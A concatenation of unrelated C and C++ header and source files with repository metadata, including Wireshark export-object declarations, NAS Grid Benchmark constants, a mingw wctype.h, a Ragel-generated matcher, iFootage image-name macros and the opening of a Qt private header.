WS_DLL_PUBLIC int register_export_object(const int proto_id, tap_packet_cb export_packet_func, export_object_gui_reset_cb reset_cb);
/** Get protocol ID from Export Object
*
* @param eo Registered Export Object
* @return protocol id of Export Object
*/
WS_DLL_PUBLIC int get_eo_proto_id(register_eo_t* eo);
/** Get string for register_tap_listener call. Typically of the form <dissector_name>_eo
*
* @param eo Registered Export Object
* @return string for register_tap_listener call
*/
WS_DLL_PUBLIC const char* get_eo_tap_listener_name(register_eo_t* eo);
/** Get tap function handler from Export Object
*
* @param eo Registered Export Object
* @return tap function handler of Export Object
*/
WS_DLL_PUBLIC tap_packet_cb get_eo_packet_func(register_eo_t* eo);
/** Get tap reset function handler from Export Object
*
* @param eo Registered Export Object
* @return tap function handler of Export Object
*/
WS_DLL_PUBLIC export_object_gui_reset_cb get_eo_reset_func(register_eo_t* eo);
/** Get Export Object by its short protocol name
*
* @param name short protocol name to fetch.
* @return Export Object handler pointer or NULL.
*/
WS_DLL_PUBLIC register_eo_t* get_eo_by_name(const char* name);
/** Iterator to walk Export Object list and execute func
*
* @param func action to be performed on all Export Objects
* @param user_data any data needed to help perform function
*/
WS_DLL_PUBLIC void eo_iterate_tables(wmem_foreach_func func, gpointer user_data);
/** Find all disallowed characters/bytes and replace them with %xx
*
* @param in_str string to massage
* @param maxlen maximum size a string can be post massage
* @param dup return a copy of the massaged string (?)
* @return massaged string
*/
WS_DLL_PUBLIC GString *eo_massage_str(const gchar *in_str, gsize maxlen, int dup);
/** Map the content type string to an extension string
*
* @param content_type content type to match with extension string
* @return extension string for content type
*/
WS_DLL_PUBLIC const char *eo_ct2ext(const char *content_type);
/** Free the contents of export_object_entry_t structure
*
* @param entry export_object_entry_t structure to be freed
*/
WS_DLL_PUBLIC void eo_free_entry(export_object_entry_t *entry);
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif /* __EXPORT_OBJECT_H__ */
/*
* Editor modelines
*
* Local Variables:
* c-basic-offset: 4
* tab-width: 8
* indent-tabs-mode: nil
* End:
*
* ex: set shiftwidth=4 tabstop=8 expandtab:
* :indentSize=4:tabSize=8:noTabs=true:
*/
| 34.896774 | 132 | 0.760399 |
0b2677495cbefabc8087db719de0466c72af5a8f | 3,588 | h | C | source/Analysis/Montego/AliasAnalysis/perftest/tests/dc/adcc.h | czen/open-ops | b1ab8da354c4aecc0fe76a562395f5861bffc207 | [
"BSD-3-Clause"
] | 23 | 2017-08-01T14:29:48.000Z | 2019-10-09T22:27:38.000Z | source/Analysis/Montego/AliasAnalysis/perftest/tests/dc/adcc.h | czen/open-ops | b1ab8da354c4aecc0fe76a562395f5861bffc207 | [
"BSD-3-Clause"
] | 2 | 2017-08-06T08:34:18.000Z | 2017-08-08T16:27:38.000Z | source/Analysis/Montego/AliasAnalysis/perftest/tests/dc/adcc.h | czen/open-ops | b1ab8da354c4aecc0fe76a562395f5861bffc207 | [
"BSD-3-Clause"
] | 2 | 2017-08-08T12:25:06.000Z | 2019-09-16T15:18:18.000Z | /*
!-------------------------------------------------------------------------!
! !
! N A S G R I D B E N C H M A R K S !
! !
! C + + V E R S I O N !
! !
! A D C C . H !
! !
!-------------------------------------------------------------------------!
! !
! The the file contains comnstants definitions used for !
! building veiws. !
! !
! Permission to use, copy, distribute and modify this software !
! for any purpose with or without fee is hereby granted. !
! We request, however, that all derived work reference the !
! NAS Grid Benchmarks 3.0 or GridNPB3.0. This software is provided !
! "as is" without expressed or implied warranty. !
! !
! Information on GridNPB3.0, including the concept of !
! the NAS Grid Benchmarks, the specifications, source code, !
! results and information on how to submit new results, !
! is available at: !
! !
! http://www.nas.nasa.gov/Software/NPB !
! !
! Send comments or suggestions to ngb@nas.nasa.gov !
! Send bug reports to ngb@nas.nasa.gov !
! !
! E-mail: ngb@nas.nasa.gov !
! Fax: (650) 604-3957 !
! !
!-------------------------------------------------------------------------!
! GridNPB3.0 C++ version !
! Michael Frumkin, Leonid Shabanov !
!-------------------------------------------------------------------------!
*/
#ifndef _ADCC_CONST_DEFS_H_
#define _ADCC_CONST_DEFS_H_
/*#define WINNT*/
//#define UNIX
#define ADC_OK 0
#define ADC_WRITE_FAILED 1
#define ADC_INTERNAL_ERROR 2
#define ADC_TREE_DESTROY_FAILURE 3
#define ADC_FILE_OPEN_FAILURE 4
#define ADC_MEMORY_ALLOCATION_FAILURE 5
#define ADC_FILE_DELETE_FAILURE 6
#define ADC_VERIFICATION_FAILED 7
#define ADC_SHMEMORY_FAILURE 8
#define SSA_BUFFER_SIZE (1024*1024)
#define MAX_NUMBER_OF_TASKS 256
#define MAX_PAR_FILE_LINE_SIZE 512
#define MAX_FILE_FULL_PATH_SIZE 512
#define MAX_ADC_NAME_SIZE 32
#define DIM_FSZ 4
#define MSR_FSZ 8
#define MAX_NUM_OF_DIMS 20
#define MAX_NUM_OF_MEAS 4
#define MAX_NUM_OF_CHUNKS 1024
#define MAX_PARAM_LINE_SIZE 1024
#define OUTPUT_BUFFER_SIZE (MAX_NUM_OF_DIMS + (MSR_FSZ/4)*MAX_NUM_OF_MEAS)
#define MAX_VIEW_REC_SIZE ((DIM_FSZ*MAX_NUM_OF_DIMS)+(MSR_FSZ*MAX_NUM_OF_MEAS))
#define MAX_VIEW_ROW_SIZE_IN_INTS (MAX_NUM_OF_DIMS + 2*MAX_NUM_OF_MEAS)
#define MLB32 0x80000000
#ifdef WINNT
#define MLB 0x8000000000000000
#else
#define MLB 0x8000000000000000LL
#endif
#endif /* _ADCC_CONST_DEFS_H_ */
| 43.228916 | 84 | 0.428372 |
b660352ee39a2a771bb68c4ffe81c2cbaad0a5b3 | 671 | h | C | ios/chrome/app/first_run_app_state_agent_testing.h | DamieFC/chromium | 54ce2d3c77723697efd22cfdb02aea38f9dfa25c | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2020-10-18T02:33:40.000Z | 2020-10-18T02:33:40.000Z | ios/chrome/app/first_run_app_state_agent_testing.h | DamieFC/chromium | 54ce2d3c77723697efd22cfdb02aea38f9dfa25c | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3 | 2021-05-17T16:28:52.000Z | 2021-05-21T22:42:22.000Z | ios/chrome/app/first_run_app_state_agent_testing.h | DamieFC/chromium | 54ce2d3c77723697efd22cfdb02aea38f9dfa25c | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | // Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef IOS_CHROME_APP_FIRST_RUN_APP_STATE_AGENT_TESTING_H_
#define IOS_CHROME_APP_FIRST_RUN_APP_STATE_AGENT_TESTING_H_
#import "ios/chrome/app/first_run_app_state_agent.h"
// Interface for testing FirstRunAppAgent.
@interface FirstRunAppAgent (TestingOnly)
// TODO(crbug.com/1210246): Remove this once the chrome test fixture is adapted
// to startup testing.
// Shows the First Run UI for testing purpose.
- (void)showFirstRunUI;
@end
#endif // IOS_CHROME_APP_FIRST_RUN_APP_STATE_AGENT_TESTING_H_
| 31.952381 | 79 | 0.81073 |
19db576c8f8a9d6418ee694811fedd1b691b6d07 | 4,796 | h | C | source/3rd_party/libtcc/runtime/windows/include/wctype.h | thiagomacg/sympp | 2aa0128a4da26a071657ec0c1f03c45d110f8e6f | [
"MIT"
] | 8 | 2020-09-29T06:12:44.000Z | 2021-11-15T08:02:14.000Z | source/3rd_party/libtcc/runtime/windows/include/wctype.h | thiagomacg/sympp | 2aa0128a4da26a071657ec0c1f03c45d110f8e6f | [
"MIT"
] | 2 | 2020-10-14T21:49:46.000Z | 2020-10-21T17:12:37.000Z | source/3rd_party/libtcc/runtime/windows/include/wctype.h | thiagomacg/sympp | 2aa0128a4da26a071657ec0c1f03c45d110f8e6f | [
"MIT"
] | 2 | 2020-10-14T20:19:11.000Z | 2021-11-15T08:02:14.000Z | /**
* This file has no copyright assigned and is placed in the Public Domain.
* This file is part of the w64 mingw-runtime package.
* No warranty is given; refer to the file DISCLAIMER within this package.
*/
#ifndef _INC_WCTYPE
#define _INC_WCTYPE
#ifndef _WIN32
#error Only Win32 target is supported!
#endif
#include <_mingw.h>
#pragma pack(push, _CRT_PACKING)
#ifdef __cplusplus
extern "C" {
#endif
#ifndef _CRTIMP
#define _CRTIMP __declspec(dllimport)
#endif
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif
#ifndef _WCTYPE_T_DEFINED
typedef unsigned short wint_t;
typedef unsigned short wctype_t;
#define _WCTYPE_T_DEFINED
#endif
#ifndef WEOF
#define WEOF (wint_t)(0xFFFF)
#endif
#ifndef _CRT_CTYPEDATA_DEFINED
#define _CRT_CTYPEDATA_DEFINED
#ifndef _CTYPE_DISABLE_MACROS
#ifndef __PCTYPE_FUNC
#define __PCTYPE_FUNC __pctype_func()
#ifdef _MSVCRT_
#define __pctype_func() (_pctype)
#else
#define __pctype_func() (*_imp___pctype)
#endif
#endif
#ifndef _pctype
#ifdef _MSVCRT_
extern unsigned short *_pctype;
#else
extern unsigned short **_imp___pctype;
#define _pctype (*_imp___pctype)
#endif
#endif
#endif
#endif
#ifndef _CRT_WCTYPEDATA_DEFINED
#define _CRT_WCTYPEDATA_DEFINED
#ifndef _CTYPE_DISABLE_MACROS
#ifndef _wctype
#ifdef _MSVCRT_
extern unsigned short *_wctype;
#else
extern unsigned short **_imp___wctype;
#define _wctype (*_imp___wctype)
#endif
#endif
#ifndef _pwctype
#ifdef _MSVCRT_
extern unsigned short *_pwctype;
#else
extern unsigned short **_imp___pwctype;
#define _pwctype (*_imp___pwctype)
#define __pwctype_func() (*_imp___pwctype)
#endif
#endif
#endif
#endif
#define _UPPER 0x1
#define _LOWER 0x2
#define _DIGIT 0x4
#define _SPACE 0x8
#define _PUNCT 0x10
#define _CONTROL 0x20
#define _BLANK 0x40
#define _HEX 0x80
#define _LEADBYTE 0x8000
#define _ALPHA (0x0100 | _UPPER | _LOWER)
#ifndef _WCTYPE_DEFINED
#define _WCTYPE_DEFINED
int __cdecl iswalpha(wint_t);
int __cdecl iswupper(wint_t);
int __cdecl iswlower(wint_t);
int __cdecl iswdigit(wint_t);
int __cdecl iswxdigit(wint_t);
int __cdecl iswspace(wint_t);
int __cdecl iswpunct(wint_t);
int __cdecl iswalnum(wint_t);
int __cdecl iswprint(wint_t);
int __cdecl iswgraph(wint_t);
int __cdecl iswcntrl(wint_t);
int __cdecl iswascii(wint_t);
int __cdecl isleadbyte(int);
wint_t __cdecl towupper(wint_t);
wint_t __cdecl towlower(wint_t);
int __cdecl iswctype(wint_t, wctype_t);
_CRTIMP int __cdecl __iswcsymf(wint_t);
_CRTIMP int __cdecl __iswcsym(wint_t);
int __cdecl is_wctype(wint_t, wctype_t);
#if (defined(__STDC_VERSION__) && __STDC_VERSION__ >= 199901L) || \
!defined(NO_OLDNAMES)
int __cdecl isblank(int _C);
#endif
#endif
#ifndef _WCTYPE_INLINE_DEFINED
#define _WCTYPE_INLINE_DEFINED
#ifndef __cplusplus
#define iswalpha(_c) (iswctype(_c, _ALPHA))
#define iswupper(_c) (iswctype(_c, _UPPER))
#define iswlower(_c) (iswctype(_c, _LOWER))
#define iswdigit(_c) (iswctype(_c, _DIGIT))
#define iswxdigit(_c) (iswctype(_c, _HEX))
#define iswspace(_c) (iswctype(_c, _SPACE))
#define iswpunct(_c) (iswctype(_c, _PUNCT))
#define iswalnum(_c) (iswctype(_c, _ALPHA | _DIGIT))
#define iswprint(_c) (iswctype(_c, _BLANK | _PUNCT | _ALPHA | _DIGIT))
#define iswgraph(_c) (iswctype(_c, _PUNCT | _ALPHA | _DIGIT))
#define iswcntrl(_c) (iswctype(_c, _CONTROL))
#define iswascii(_c) ((unsigned)(_c) < 0x80)
#define isleadbyte(c) (__pctype_func()[(unsigned char)(c)] & _LEADBYTE)
#else
__CRT_INLINE int __cdecl iswalpha(wint_t _C) { return (iswctype(_C, _ALPHA)); }
__CRT_INLINE int __cdecl iswupper(wint_t _C) { return (iswctype(_C, _UPPER)); }
__CRT_INLINE int __cdecl iswlower(wint_t _C) { return (iswctype(_C, _LOWER)); }
__CRT_INLINE int __cdecl iswdigit(wint_t _C) { return (iswctype(_C, _DIGIT)); }
__CRT_INLINE int __cdecl iswxdigit(wint_t _C) { return (iswctype(_C, _HEX)); }
__CRT_INLINE int __cdecl iswspace(wint_t _C) { return (iswctype(_C, _SPACE)); }
__CRT_INLINE int __cdecl iswpunct(wint_t _C) { return (iswctype(_C, _PUNCT)); }
__CRT_INLINE int __cdecl iswalnum(wint_t _C) {
return (iswctype(_C, _ALPHA | _DIGIT));
}
__CRT_INLINE int __cdecl iswprint(wint_t _C) {
return (iswctype(_C, _BLANK | _PUNCT | _ALPHA | _DIGIT));
}
__CRT_INLINE int __cdecl iswgraph(wint_t _C) {
return (iswctype(_C, _PUNCT | _ALPHA | _DIGIT));
}
__CRT_INLINE int __cdecl iswcntrl(wint_t _C) {
return (iswctype(_C, _CONTROL));
}
__CRT_INLINE int __cdecl iswascii(wint_t _C) { return ((unsigned)(_C) < 0x80); }
__CRT_INLINE int __cdecl isleadbyte(int _C) {
return (__pctype_func()[(unsigned char)(_C)] & _LEADBYTE);
}
#endif
#endif
typedef wchar_t wctrans_t;
wint_t __cdecl towctrans(wint_t, wctrans_t);
wctrans_t __cdecl wctrans(const char *);
wctype_t __cdecl wctype(const char *);
#ifdef __cplusplus
}
#endif
#pragma pack(pop)
#endif
| 26.065217 | 80 | 0.766055 |
39abee6d94d4c914041fd26df24adc9da2509ba6 | 7,936 | c | C | re2c/benchmarks/submatch_dfa_aot/pregen/ragel/21__cat2_4.c | adesutherland/crexx | e8d17152c565e9387ee8c33c653b4910b56f5165 | [
"MIT"
] | 8 | 2020-11-08T15:36:14.000Z | 2022-03-27T13:50:07.000Z | re2c/benchmarks/submatch_dfa_aot/pregen/ragel/21__cat2_4.c | adesutherland/crexx | e8d17152c565e9387ee8c33c653b4910b56f5165 | [
"MIT"
] | 98 | 2020-11-12T11:49:41.000Z | 2022-03-27T17:24:13.000Z | re2c/benchmarks/submatch_dfa_aot/pregen/ragel/21__cat2_4.c | adesutherland/crexx | e8d17152c565e9387ee8c33c653b4910b56f5165 | [
"MIT"
] | 10 | 2021-03-31T13:50:52.000Z | 2021-12-02T03:34:42.000Z | #line 1 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
#include "ragel/common.c"
const char *delim = "\n";
#line 17 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
#line 12 "gen/ragel/21__cat2_4.c"
static const int abcd_start = 16;
static const int abcd_first_final = 16;
static const int abcd_error = 0;
static const int abcd_en_main = 16;
#line 19 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
static void lex(Input *in, Output *out)
{
char *p = in->p;
char *pe = in->pe;
const char
*a0, *a1,
*b0, *b1;
int cs;
#line 33 "gen/ragel/21__cat2_4.c"
{
cs = (int)abcd_start;
}
#line 30 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
#line 41 "gen/ragel/21__cat2_4.c"
{
switch ( cs ) {
case 16:
goto st_case_16;
case 0:
goto st_case_0;
case 1:
goto st_case_1;
case 2:
goto st_case_2;
case 3:
goto st_case_3;
case 4:
goto st_case_4;
case 5:
goto st_case_5;
case 6:
goto st_case_6;
case 7:
goto st_case_7;
case 8:
goto st_case_8;
case 9:
goto st_case_9;
case 10:
goto st_case_10;
case 11:
goto st_case_11;
case 12:
goto st_case_12;
case 13:
goto st_case_13;
case 14:
goto st_case_14;
case 15:
goto st_case_15;
}
_ctr17:
{
#line 11 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
outs(out, a0, b0); outc(out, '.'); outs(out, b0, a1); outc(out, '.');
outs(out, a1, b1); outc(out, '.'); outs(out, b1, p + 1);
}
#line 87 "gen/ragel/21__cat2_4.c"
goto _st16;
_st16:
p+= 1;
st_case_16:
if ( p == pe )
goto _out16;
if ( ( (*( p))) == 97 ) {
goto _ctr29;
}
goto _st0;
_st0:
st_case_0:
goto _out0;
_ctr29:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a0 = p; }
#line 107 "gen/ragel/21__cat2_4.c"
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 113 "gen/ragel/21__cat2_4.c"
goto _st1;
_st1:
p+= 1;
st_case_1:
if ( p == pe )
goto _out1;
if ( ( (*( p))) == 97 ) {
goto _ctr2;
}
goto _st0;
_ctr2:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 130 "gen/ragel/21__cat2_4.c"
goto _st2;
_st2:
p+= 1;
st_case_2:
if ( p == pe )
goto _out2;
if ( ( (*( p))) == 97 ) {
goto _ctr4;
}
goto _st0;
_ctr4:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 147 "gen/ragel/21__cat2_4.c"
goto _st3;
_st3:
p+= 1;
st_case_3:
if ( p == pe )
goto _out3;
if ( ( (*( p))) == 97 ) {
goto _ctr6;
}
goto _st0;
_ctr6:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 164 "gen/ragel/21__cat2_4.c"
goto _st4;
_st4:
p+= 1;
st_case_4:
if ( p == pe )
goto _out4;
switch( ( (*( p))) ) {
case 97: {
goto _ctr8;
}
case 98: {
goto _st15;
}
}
goto _st0;
_ctr8:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 186 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a1 = p; }
#line 192 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 198 "gen/ragel/21__cat2_4.c"
goto _st5;
_st5:
p+= 1;
st_case_5:
if ( p == pe )
goto _out5;
switch( ( (*( p))) ) {
case 97: {
goto _ctr11;
}
case 98: {
goto _st15;
}
}
goto _st0;
_ctr11:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 220 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a1 = p; }
#line 226 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 232 "gen/ragel/21__cat2_4.c"
goto _st6;
_st6:
p+= 1;
st_case_6:
if ( p == pe )
goto _out6;
switch( ( (*( p))) ) {
case 97: {
goto _ctr13;
}
case 98: {
goto _st15;
}
}
goto _st0;
_ctr13:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 254 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a1 = p; }
#line 260 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 266 "gen/ragel/21__cat2_4.c"
goto _st7;
_st7:
p+= 1;
st_case_7:
if ( p == pe )
goto _out7;
switch( ( (*( p))) ) {
case 97: {
goto _ctr15;
}
case 98: {
goto _st15;
}
}
goto _st0;
_ctr15:
{
#line 9 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b0 = p; }
#line 288 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a1 = p; }
#line 294 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 300 "gen/ragel/21__cat2_4.c"
goto _st8;
_st8:
p+= 1;
st_case_8:
if ( p == pe )
goto _out8;
switch( ( (*( p))) ) {
case 10: {
goto _ctr17;
}
case 97: {
goto _ctr15;
}
case 98: {
goto _st9;
}
}
goto _st0;
_st9:
p+= 1;
st_case_9:
if ( p == pe )
goto _out9;
switch( ( (*( p))) ) {
case 10: {
goto _ctr17;
}
case 97: {
goto _ctr19;
}
case 98: {
goto _st9;
}
}
goto _st0;
_ctr19:
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
a1 = p; }
#line 342 "gen/ragel/21__cat2_4.c"
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 348 "gen/ragel/21__cat2_4.c"
goto _st10;
_st10:
p+= 1;
st_case_10:
if ( p == pe )
goto _out10;
if ( ( (*( p))) == 97 ) {
goto _ctr21;
}
goto _st0;
_ctr21:
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 365 "gen/ragel/21__cat2_4.c"
goto _st11;
_st11:
p+= 1;
st_case_11:
if ( p == pe )
goto _out11;
if ( ( (*( p))) == 97 ) {
goto _ctr23;
}
goto _st0;
_ctr23:
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 382 "gen/ragel/21__cat2_4.c"
goto _st12;
_st12:
p+= 1;
st_case_12:
if ( p == pe )
goto _out12;
if ( ( (*( p))) == 97 ) {
goto _ctr25;
}
goto _st0;
_ctr25:
{
#line 10 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
b1 = p; }
#line 399 "gen/ragel/21__cat2_4.c"
goto _st13;
_st13:
p+= 1;
st_case_13:
if ( p == pe )
goto _out13;
switch( ( (*( p))) ) {
case 10: {
goto _ctr17;
}
case 97: {
goto _ctr25;
}
case 98: {
goto _st14;
}
}
goto _st0;
_st14:
p+= 1;
st_case_14:
if ( p == pe )
goto _out14;
switch( ( (*( p))) ) {
case 10: {
goto _ctr17;
}
case 98: {
goto _st14;
}
}
goto _st0;
_st15:
p+= 1;
st_case_15:
if ( p == pe )
goto _out15;
switch( ( (*( p))) ) {
case 97: {
goto _ctr19;
}
case 98: {
goto _st15;
}
}
goto _st0;
_out16: cs = 16; goto _out;
_out0: cs = 0; goto _out;
_out1: cs = 1; goto _out;
_out2: cs = 2; goto _out;
_out3: cs = 3; goto _out;
_out4: cs = 4; goto _out;
_out5: cs = 5; goto _out;
_out6: cs = 6; goto _out;
_out7: cs = 7; goto _out;
_out8: cs = 8; goto _out;
_out9: cs = 9; goto _out;
_out10: cs = 10; goto _out;
_out11: cs = 11; goto _out;
_out12: cs = 12; goto _out;
_out13: cs = 13; goto _out;
_out14: cs = 14; goto _out;
_out15: cs = 15; goto _out;
_out: {}
}
#line 31 "../../../benchmarks/submatch_dfa_aot/src/ragel/21__cat2_4.rl"
in->p = p;
in->pe = pe;
}
| 16.813559 | 72 | 0.556074 |
9575c1a2a478e646b1a92ca54084a4a72528b8f1 | 2,653 | h | C | iFootageFramework/iFootageFramework/Main/Tools/iFLibrary/iFAllImageNameDefine.h | 414039949/iFootageFramework | 25dada05a2605811bff4ac9d9fb4e1e233462684 | [
"MIT"
] | null | null | null | iFootageFramework/iFootageFramework/Main/Tools/iFLibrary/iFAllImageNameDefine.h | 414039949/iFootageFramework | 25dada05a2605811bff4ac9d9fb4e1e233462684 | [
"MIT"
] | null | null | null | iFootageFramework/iFootageFramework/Main/Tools/iFLibrary/iFAllImageNameDefine.h | 414039949/iFootageFramework | 25dada05a2605811bff4ac9d9fb4e1e233462684 | [
"MIT"
] | null | null | null | //
// iFAllImageNameDefine.h
// iFootage
//
// Created by 黄品源 on 2017/7/27.
// Copyright © 2017年 iFootage. All rights reserved.
//
#ifndef iFAllImageNameDefine_h
#define iFAllImageNameDefine_h
#endif /* iFAllImageNameDefine_h */
#define root_BACKGROUNDIMG @"rootBackground"
#define all_black_BTNIMG @"blackbtnIMG"
#define all_gray_BTNIMG @"graybtnIMG"
#define all_WHITE_BACKIMG @"whiteBackGround@3x"
#define all_BLACK_BACKIMG @"blackBackGround@3x"
#define all_RED_BACKIMG @"redBackGround@3x"
#define all_PAUSEBTNIMG @"all_PauseBtn"
#define all_PALYBTNIMG @"all_playBtn"
#define all_STOPBTNIMG @"all_stopBtn"
/**
mainVC
@return return value description
*/
#define main_TIMELINEIMG @"TimelineControl.png"
#define main_MANUALCTLIMG @"ManualControl.png"
#define main_TARGETCTLIMG @"TargetControl.png"
#define main_STITCHINGIMG @"Stitching.png"
#define main_SETTINGSIMG @"Settings.png"
#define main_COMMUNITY @"Community.png"
#define main_IFOOTAGE_ICONIMG @"ifootage_icon.png"
#define main_IFOOTAGE_TITLEIMG @"IFOOTAGE1.png"
#define main_RINGIMG @"ring.png"
/**
settings
@return return value description
*/
#define setting_LEFT_black_BTNIMG @"leftBlackbackIMG"
#define setting_RIGHT_gray_BTNIMG @"rightGraybackIMG"
#define setting_SEGMENTRINGIMG @"segmentRing"
#define setting_SLIDE_BACKIMG @"slidebackIMG"
#define setting_SLIDE_RINGIMG @"slidebackRingIMG"
#define setting_SLIDE_BTNIMG @"slideBtnIMG"
#define setting_SLIDE_UPDATE_BTNIMG @"update"
#define setting_SLIDE_UPDATE_RINGIMG @"updateBtnRingIMG"
/**
targetVC
@return return value description
*/
#define target_RED_CAMERAIMG @"red_camera"
#define target_WHITE_CAMERAIMG @"white_camera"
#define target_UNLOOPIMG @"targetunloop"
#define target_LOOPIMG @"target_loop"
/**
timeline
@return return value description
*/
#define Timeline_S_SELECTED @"timelapse_Slider_Selected.png"
#define Timeline_S_unSELECTED @"timelapse_Slider_unSelected.png"
#define Timeline_P_SELECTED @"timelapse_Pan_Selected@3x.png"
#define Timeline_P_unSELECTED @"timelapse_Pan_unSelected@3x.png"
#define Timeline_T_SELECTED @"timelapse_Tilt_Selected.png"
#define Timeline_T_unSELECTED @"timelapse_Tilt_unSelected.png"
#define Timeline_PREVIEWBTN @"Timelapse_preview"
#define Timeline_KEYBTN @"time_key"
#define Timeline_SAVEBTN @"Timelapse_SaveBtn"
#define Timeline_PAUSEBTN @"all_PauseBtn"
#define Timeline_STOPBTN @"all_stopBtn"
#define Timeline_PLAYBTN @"all_playBtn"
/*
manualVC
*/
#define manual_CURVEIMG @"manual_Curve_bg"
#define stitch_GRIDIMG @"Gird"
#define stitch_PANOIMG @"pano"
#define scan_SLIDEICONIMG @"scan_slideicon"
#define scan_X2ICONIMG @"scan_x2icon"
| 23.6875 | 64 | 0.802865 |
7f0a1795c5a3d0682c2f09b86753be57c4fecc43 | 5,019 | h | C | windowsbuild/MSVC2017/Qt/5.14.2/include/QtWidgets/5.14.2/QtWidgets/private/qwidgetrepaintmanager_p.h | Tech-XCorp/visit-deps | 23e2bd534bf9c332d6b7d32310495f1f65b1b936 | [
"BSD-3-Clause"
] | null | null | null | windowsbuild/MSVC2017/Qt/5.14.2/include/QtWidgets/5.14.2/QtWidgets/private/qwidgetrepaintmanager_p.h | Tech-XCorp/visit-deps | 23e2bd534bf9c332d6b7d32310495f1f65b1b936 | [
"BSD-3-Clause"
] | null | null | null | windowsbuild/MSVC2017/Qt/5.14.2/include/QtWidgets/5.14.2/QtWidgets/private/qwidgetrepaintmanager_p.h | Tech-XCorp/visit-deps | 23e2bd534bf9c332d6b7d32310495f1f65b1b936 | [
"BSD-3-Clause"
] | null | null | null | /****************************************************************************
**
** Copyright (C) 2016 The Qt Company Ltd.
** Contact: https://www.qt.io/licensing/
**
** This file is part of the QtWidgets module of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:LGPL$
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this file in
** accordance with the commercial license agreement provided with the
** Software or, alternatively, in accordance with the terms contained in
** a written agreement between you and The Qt Company. For licensing terms
** and conditions see https://www.qt.io/terms-conditions. For further
** information use the contact form at https://www.qt.io/contact-us.
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 3 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL3 included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 3 requirements
** will be met: https://www.gnu.org/licenses/lgpl-3.0.html.
**
** GNU General Public License Usage
** Alternatively, this file may be used under the terms of the GNU
** General Public License version 2.0 or (at your option) the GNU General
** Public license version 3 or any later version approved by the KDE Free
** Qt Foundation. The licenses are as published by the Free Software
** Foundation and appearing in the file LICENSE.GPL2 and LICENSE.GPL3
** included in the packaging of this file. Please review the following
** information to ensure the GNU General Public License requirements will
** be met: https://www.gnu.org/licenses/gpl-2.0.html and
** https://www.gnu.org/licenses/gpl-3.0.html.
**
** $QT_END_LICENSE$
**
****************************************************************************/
#ifndef QWIDGETREPAINTMANAGER_P_H
#define QWIDGETREPAINTMANAGER_P_H
//
// W A R N I N G
// -------------
//
// This file is not part of the Qt API. It exists purely as an
// implementation detail. This header file may change from version to
// version without notice, or even be removed.
//
// We mean it.
//
#include <QtWidgets/private/qtwidgetsglobal_p.h>
#include <QDebug>
#include <QtWidgets/qwidget.h>
#include <private/qwidget_p.h>
#include <QtGui/qbackingstore.h>
QT_BEGIN_NAMESPACE
class QPlatformTextureList;
class QPlatformTextureListWatcher;
class QWidgetRepaintManager;
class Q_AUTOTEST_EXPORT QWidgetRepaintManager
{
Q_GADGET
public:
enum UpdateTime {
UpdateNow,
UpdateLater
};
Q_ENUM(UpdateTime)
